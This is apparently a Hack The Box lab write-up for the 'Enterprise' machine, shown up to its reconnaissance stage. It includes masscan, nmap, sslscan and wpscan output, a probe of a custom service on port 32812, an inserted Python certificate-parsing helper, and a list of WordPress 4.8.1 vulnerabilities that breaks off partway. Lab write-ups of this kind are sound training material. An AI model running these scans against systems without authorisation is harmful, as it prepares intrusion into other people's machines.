Enterprise
Port scan
u505@kali:~/HTB/Machines/Enterprise$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.61
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-21 21:03:15 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.61
Discovered open port 22/tcp on 10.10.10.61
Discovered open port 32812/tcp on 10.10.10.61
Discovered open port 443/tcp on 10.10.10.61
Discovered open port 80/tcp on 10.10.10.61

u505@kali:~/HTB/Machines/Enterprise$ nmap -sC -sV 10.10.10.61
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 17:03 EDT
Nmap scan report for 10.10.10.61
Host is up (0.037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
|   256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
|_  256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
80/tcp   open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: USS Enterprise – Ships Log
443/tcp  open  ssl/http Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
| Not valid before: 2017-08-25T10:35:14
|_Not valid after:  2017-09-24T10:35:14
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
8080/tcp open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: Joomla! - Open Source Content Management
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.30 seconds
We run sslscan against port 443.
u505@kali:~/HTB/Machines/Enterprise$ sslscan --show-certificate https://enterprise.local
Version: 2.0.0-static
OpenSSL 1.1.1h-dev  xx XXX xxxx

Connected to 10.10.10.61

Testing SSL server enterprise.local on port 443 using SNI name enterprise.local

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   disabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.1  256 bits  AES256-SHA
Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.1  128 bits  AES128-SHA
Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA

  Server Key Exchange Group(s):
TLSv1.2  141 bits  sect283k1
TLSv1.2  141 bits  sect283r1
TLSv1.2  204 bits  sect409k1
TLSv1.2  204 bits  sect409r1
TLSv1.2  285 bits  sect571k1
TLSv1.2  285 bits  sect571r1
TLSv1.2  128 bits  secp256k1
TLSv1.2  128 bits  secp256r1 (NIST P-256)
TLSv1.2  192 bits  secp384r1 (NIST P-384)
TLSv1.2  260 bits  secp521r1 (NIST P-521)
TLSv1.2  128 bits  brainpoolP256r1
TLSv1.2  192 bits  brainpoolP384r1
TLSv1.2  256 bits  brainpoolP512r1

  Server Signature Algorithm(s):
TLSv1.2  rsa_pkcs1_sha1
TLSv1.2  dsa_sha1
TLSv1.2  ecdsa_sha1
TLSv1.2  rsa_pkcs1_sha224
TLSv1.2  dsa_sha224
TLSv1.2  ecdsa_sha224
TLSv1.2  rsa_pkcs1_sha256
TLSv1.2  dsa_sha256
TLSv1.2  ecdsa_secp256r1_sha256
TLSv1.2  rsa_pkcs1_sha384
TLSv1.2  dsa_sha384
TLSv1.2  ecdsa_secp384r1_sha384
TLSv1.2  rsa_pkcs1_sha512
TLSv1.2  dsa_sha512
TLSv1.2  ecdsa_secp521r1_sha512

  SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
MIIERTCCAy2gAwIBAgIJALffXrYDvptrMA0GCSqGSIb3DQEBCwUAMIG4MQswCQYD
VQQGEwJVSzElMCMGA1UECAwcVW5pdGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEO
MAwGA1UEBwwFRWFydGgxFzAVBgNVBAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQL
DAZCcmlkZ2UxGTAXBgNVBAMMEGVudGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0B
CQEWHmplYW5sdWNwaWNhcmRAZW50ZXJwcmlzZS5sb2NhbDAeFw0xNzA4MjUxMDM1
MTRaFw0xNzA5MjQxMDM1MTRaMIG4MQswCQYDVQQGEwJVSzElMCMGA1UECAwcVW5p
dGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEOMAwGA1UEBwwFRWFydGgxFzAVBgNV
BAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQLDAZCcmlkZ2UxGTAXBgNVBAMMEGVu
dGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0BCQEWHmplYW5sdWNwaWNhcmRAZW50
ZXJwcmlzZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnT
YTRemITs1/mZWwneQqW+s9wgvRUhgxGD7CwqYmhgwDS2N7MlcNZJYtoi46x3TJ52
qe4WleGMRxxVDDvveqGYb2Hs230Di13gheCLc9kXNEIfVa3PtgR2KUth42rq4VPQ
l7O0vCipdyKt0NkUHxUUcUOoRakueQmFWh57gXm7vAwqvuzm3byhYoq4yverKmL3
IChJKPxLur5XRVk4sXbhR3pESLYs+tKMTx0wzFMtEPAqyLY/f4efemgCwCNTe0s3
+C0COiIgTgMZn2rx2ToqOrNNwFVkVKQoSRrMQ4/7P5Mheyu+dL/MWnc/SxPSgie+
miq3oqeFeZWje5lQKwUCAwEAAaNQME4wHQYDVR0OBBYEFKU8n3KqjrULUsCOyW7C
ewA0TVevMB8GA1UdIwQYMBaAFKU8n3KqjrULUsCOyW7CewA0TVevMAwGA1UdEwQF
MAMBAf8wDQYJKoZIhvcNAQELBQADggEBAC3/EPr9EdW6lQ6RuFJ1/5kPtJU7XvaY
DV8fyd6uXkWigzd/HpnlVAjF0rQdDRhfE4HRbNez6zCGcV3F5Pxl3OgzmdX5TtfH
OlU2R5eY3TBIuARtywOM/aJZTN8NuYxUZ5Z/Su6GwtDO3ot6hZmRbcaUA41Wg6qZ
O+BSgoJctQqR1eKV5NjZ5IqgUqQWmqs2x9JqH7or++aMf1GeHd08c0gSKHRgA4PB
NAbDye/ORY7yVr+In3zKSpBU2xosNngxbvgn3ZGGfGVBhzHw3k9KykofNykbu5tD
Dp1D4W+G+LvAcPCAEM5W96Y6dWyVplvyZOgySi31MPIw5rGBm5tTcHU=
-----END CERTIFICATE-----
Version: 2
Serial Number: b7:df:5e:b6:03:be:9b:6b
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=UK/ST=United Federation of Planets/L=Earth/O=USS Enterprise/OU=Bridge/CN=enterprise.local/emailAddress=jeanlucpicard@enterprise.local
Not valid before: Aug 25 10:35:14 2017 GMT
Not valid after: Sep 24 10:35:14 2017 GMT
Subject: /C=UK/ST=United Federation of Planets/L=Earth/O=USS Enterprise/OU=Bridge/CN=enterprise.local/emailAddress=jeanlucpicard@enterprise.local
Public Key Algorithm: NULL
RSA Public Key: (2048 bit)
RSA Public-Key: (2048 bit)
Modulus:
    00:b9:d3:61:34:5e:98:84:ec:d7:f9:99:5b:09:de:
    42:a5:be:b3:dc:20:bd:15:21:83:11:83:ec:2c:2a:
    62:68:60:c0:34:b6:37:b3:25:70:d6:49:62:da:22:
    e3:ac:77:4c:9e:76:a9:ee:16:95:e1:8c:47:1c:55:
    0c:3b:ef:7a:a1:98:6f:61:ec:db:7d:03:8b:5d:e0:
    85:e0:8b:73:d9:17:34:42:1f:55:ad:cf:b6:04:76:
    29:4b:61:e3:6a:ea:e1:53:d0:97:b3:b4:bc:28:a9:
    77:22:ad:d0:d9:14:1f:15:14:71:43:a8:45:a9:2e:
    79:09:85:5a:1e:7b:81:79:bb:bc:0c:2a:be:ec:e6:
    dd:bc:a1:62:8a:b8:ca:f7:ab:2a:62:f7:20:28:49:
    28:fc:4b:ba:be:57:45:59:38:b1:76:e1:47:7a:44:
    48:b6:2c:fa:d2:8c:4f:1d:30:cc:53:2d:10:f0:2a:
    c8:b6:3f:7f:87:9f:7a:68:02:c0:23:53:7b:4b:37:
    f8:2d:02:3a:22:20:4e:03:19:9f:6a:f1:d9:3a:2a:
    3a:b3:4d:c0:55:64:54:a4:28:49:1a:cc:43:8f:fb:
    3f:93:21:7b:2b:be:74:bf:cc:5a:77:3f:4b:13:d2:
    82:27:be:9a:2a:b7:a2:a7:85:79:95:a3:7b:99:50:
    2b:05
Exponent: 65537 (0x10001)
X509v3 Extensions:
  X509v3 Subject Key Identifier:
    A5:3C:9F:72:AA:8E:B5:0B:52:C0:8E:C9:6E:C2:7B:00:34:4D:57:AF
  X509v3 Authority Key Identifier:
    keyid:A5:3C:9F:72:AA:8E:B5:0B:52:C0:8E:C9:6E:C2:7B:00:34:4D:57:AF
  X509v3 Basic Constraints:
    CA:TRUE
Verify Certificate:
self signed certificate

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  enterprise.local
Issuer:   enterprise.local

Not valid before: Aug 25 10:35:14 2017 GMT
Not valid after:  Sep 24 10:35:14 2017 GMT
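The sslscan output above already tells us the certificate is self-signed, CA:TRUE, and expired a long time before the scan. As an added example (this is not code from the original writeup), the pure-Python DER walker below reads exactly the PEM blob sslscan dumped, pulls the serial, validity window and issuer/subject out of the TBSCertificate without any third-party library, and reproduces the checks a defender's certificate inventory would raise. SCAN_TIME is taken from the nmap timestamp above (2020-05-21 17:03 EDT, i.e. 21:03 UTC); everything else comes from the certificate itself.

```python
import base64
import re
from datetime import datetime, timezone

# Certificate served on 10.10.10.61:443, copied verbatim from the sslscan output above.
ENTERPRISE_PEM = """-----BEGIN CERTIFICATE-----
MIIERTCCAy2gAwIBAgIJALffXrYDvptrMA0GCSqGSIb3DQEBCwUAMIG4MQswCQYD
VQQGEwJVSzElMCMGA1UECAwcVW5pdGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEO
MAwGA1UEBwwFRWFydGgxFzAVBgNVBAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQL
DAZCcmlkZ2UxGTAXBgNVBAMMEGVudGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0B
CQEWHmplYW5sdWNwaWNhcmRAZW50ZXJwcmlzZS5sb2NhbDAeFw0xNzA4MjUxMDM1
MTRaFw0xNzA5MjQxMDM1MTRaMIG4MQswCQYDVQQGEwJVSzElMCMGA1UECAwcVW5p
dGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEOMAwGA1UEBwwFRWFydGgxFzAVBgNV
BAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQLDAZCcmlkZ2UxGTAXBgNVBAMMEGVu
dGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0BCQEWHmplYW5sdWNwaWNhcmRAZW50
ZXJwcmlzZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnT
YTRemITs1/mZWwneQqW+s9wgvRUhgxGD7CwqYmhgwDS2N7MlcNZJYtoi46x3TJ52
qe4WleGMRxxVDDvveqGYb2Hs230Di13gheCLc9kXNEIfVa3PtgR2KUth42rq4VPQ
l7O0vCipdyKt0NkUHxUUcUOoRakueQmFWh57gXm7vAwqvuzm3byhYoq4yverKmL3
IChJKPxLur5XRVk4sXbhR3pESLYs+tKMTx0wzFMtEPAqyLY/f4efemgCwCNTe0s3
+C0COiIgTgMZn2rx2ToqOrNNwFVkVKQoSRrMQ4/7P5Mheyu+dL/MWnc/SxPSgie+
miq3oqeFeZWje5lQKwUCAwEAAaNQME4wHQYDVR0OBBYEFKU8n3KqjrULUsCOyW7C
ewA0TVevMB8GA1UdIwQYMBaAFKU8n3KqjrULUsCOyW7CewA0TVevMAwGA1UdEwQF
MAMBAf8wDQYJKoZIhvcNAQELBQADggEBAC3/EPr9EdW6lQ6RuFJ1/5kPtJU7XvaY
DV8fyd6uXkWigzd/HpnlVAjF0rQdDRhfE4HRbNez6zCGcV3F5Pxl3OgzmdX5TtfH
OlU2R5eY3TBIuARtywOM/aJZTN8NuYxUZ5Z/Su6GwtDO3ot6hZmRbcaUA41Wg6qZ
O+BSgoJctQqR1eKV5NjZ5IqgUqQWmqs2x9JqH7or++aMf1GeHd08c0gSKHRgA4PB
NAbDye/ORY7yVr+In3zKSpBU2xosNngxbvgn3ZGGfGVBhzHw3k9KykofNykbu5tD
Dp1D4W+G+LvAcPCAEM5W96Y6dWyVplvyZOgySi31MPIw5rGBm5tTcHU=
-----END CERTIFICATE-----"""

# When the scan ran: nmap reported 2020-05-21 17:03 EDT, which is 21:03 UTC.
SCAN_TIME = datetime(2020, 5, 21, 21, 3, tzinfo=timezone.utc)


def pem_to_der(pem):
    """Strip the PEM armour and base64-decode to DER bytes."""
    body = re.sub(r"-----(BEGIN|END) CERTIFICATE-----", "", pem)
    return base64.b64decode("".join(body.split()))


def read_tlv(buf, pos):
    """Decode one DER tag-length-value; return (tag, content, raw, end_offset)."""
    start, tag, length, pos = pos, buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                  # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    end = pos + length
    return tag, buf[pos:end], buf[start:end], end


def children(content):
    """List the TLVs inside a constructed (SEQUENCE/SET) element."""
    out, pos = [], 0
    while pos < len(content):
        tag, value, raw, pos = read_tlv(content, pos)
        out.append((tag, value, raw))
    return out


def parse_time(tag, value):
    """UTCTime (0x17, YYMMDDHHMMSSZ) or GeneralizedTime (0x18, YYYYMMDDHHMMSSZ)."""
    text = value.decode("ascii")
    if tag == 0x17:                    # RFC 5280 pivot: 50-99 -> 19xx, 00-49 -> 20xx
        yy = int(text[:2])
        text = str(yy + (1900 if yy >= 50 else 2000)) + text[2:]
    return datetime.strptime(text, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)


def inspect_certificate(pem):
    """Walk Certificate -> tbsCertificate and pull out serial, validity, issuer/subject."""
    der = pem_to_der(pem)
    cert = read_tlv(der, 0)[1]         # Certificate ::= SEQUENCE { tbs, sigAlg, signature }
    fields = children(children(cert)[0][1])
    if fields[0][0] == 0xA0:           # optional [0] EXPLICIT version comes first
        fields = fields[1:]
    validity = children(fields[3][1])  # SEQUENCE { notBefore, notAfter }
    return {
        "serial": int.from_bytes(fields[0][1], "big", signed=True),
        "not_before": parse_time(*validity[0][:2]),
        "not_after": parse_time(*validity[1][:2]),
        # Names compared as raw DER: identical encodings mean the cert issued itself.
        "self_signed": fields[2][2] == fields[4][2],
    }


def certificate_findings(pem, now):
    """Checks a defender's TLS inventory would flag for this certificate."""
    info = inspect_certificate(pem)
    findings = []
    if info["self_signed"]:
        findings.append("self-signed: issuer and subject are identical")
    if now > info["not_after"]:
        findings.append(f"expired {(now - info['not_after']).days} days before the scan")
    elif now < info["not_before"]:
        findings.append("not yet valid at scan time")
    findings.append(f"lifetime {(info['not_after'] - info['not_before']).days} days")
    return info, findings
```

Calling `certificate_findings(ENTERPRISE_PEM, SCAN_TIME)` returns the serial b7df5eb603be9b6b that sslscan printed, the 2017-08-25 to 2017-09-24 validity window, and three findings: self-signed, expired 970 days before the scan, and a 30-day lifetime. The issuer/subject comparison is done on the raw DER of the two Name structures rather than on their string rendering, which is the same test OpenSSL's "self signed certificate" verdict is based on.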
masscan also reported an unusual high port, 32812, so we scan it on its own.
u505@kali:~/HTB/Machines/Enterprise$ nmap -sC -sV -p 32812 10.10.10.61
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 17:07 EDT
Nmap scan report for enterprise.htb (10.10.10.61)
Host is up (0.24s latency).

PORT      STATE SERVICE VERSION
32812/tcp open  unknown
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|                      _______ _______  ______ _______
|               |      |       |_____| |_____/ |______
|               |_____ |_____  |     | |    \_ ______|
|     Welcome to the Library Computer Access and Retrieval System
|     Enter Bridge Access Code:
|     Invalid Code
|     Terminating Console
|   NULL:
|                      _______ _______  ______ _______
|               |      |       |_____| |_____/ |______
|               |_____ |_____  |     | |    \_ ______|
|     Welcome to the Library Computer Access and Retrieval System
|_    Enter Bridge Access Code:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port32812-TCP:V=7.80%I=7%D=5/21%Time=5EC6ED93%P=x86_64-pc-linux-gnu%r(N
SF:ULL,ED,"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_______\x20_______\x20\x20______\x20_______\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x
SF:20\x20\|_____\|\x20\|_____/\x20\|______\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\|_____\x20\|_____\x20\x20\|\x20\x20\x20\x20\x20\|\x20\|\x20\
SF:x20\x20\x20\\_\x20______\|\n\nWelcome\x20to\x20the\x20Library\x20Comput
SF:er\x20Access\x20and\x20Retrieval\x20System\n\nEnter\x20Bridge\x20Access
SF:\x20Code:\x20\n")%r(GenericLines,110,"\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______\x
SF:20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x
SF:20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\x2
SF:0\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x20
SF:to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Syste
SF:m\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermina
SF:ting\x20Console\n\n")%r(GetRequest,110,"\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______
SF:\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20
SF:\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\
SF:x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x
SF:20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Sys
SF:tem\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermi
SF:nating\x20Console\n\n")%r(HTTPOptions,110,"\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20___
SF:___\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\
SF:x20\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|___
SF:___\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20
SF:\|\x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcom
SF:e\x20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20
SF:System\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTe
SF:rminating\x20Console\n\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds
Port 32812
u505@kali:~/HTB/Machines/Enterprise$ nc 10.10.10.61 32812

                 _______ _______  ______ _______
          |      |       |_____| |_____/ |______
          |_____ |_____  |     | |    \_ ______|

Welcome to the Library Computer Access and Retrieval System

Enter Bridge Access Code: 12345

Invalid Code
Terminating Console

Ncat: Broken pipe.
It looks like a custom program, probably with an overflow vulnerability, but we will come back to it later.
Port 80
Wpscan
u505@kali:~/HTB/Machines/Enterprise$ wpscan --url http://10.10.10.61 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <API_TOKEN>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] File(s) Updated:
 | metadata.json
 | dynamic_finders.yml
[i] Update completed.

[+] URL: http://10.10.10.61/ [10.10.10.61]
[+] Started: Thu May 21 17:19:33 2020

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://10.10.10.61/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.61/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.61/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://10.10.10.61/?feed=atom, <generator uri="https://wordpress.org/" version="4.8.1">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://10.10.10.61/wp-admin/load-styles.php, Match: '4.8.1'
 |
 | [!] 43 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |      - https://hackerone.com/reports/205481
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
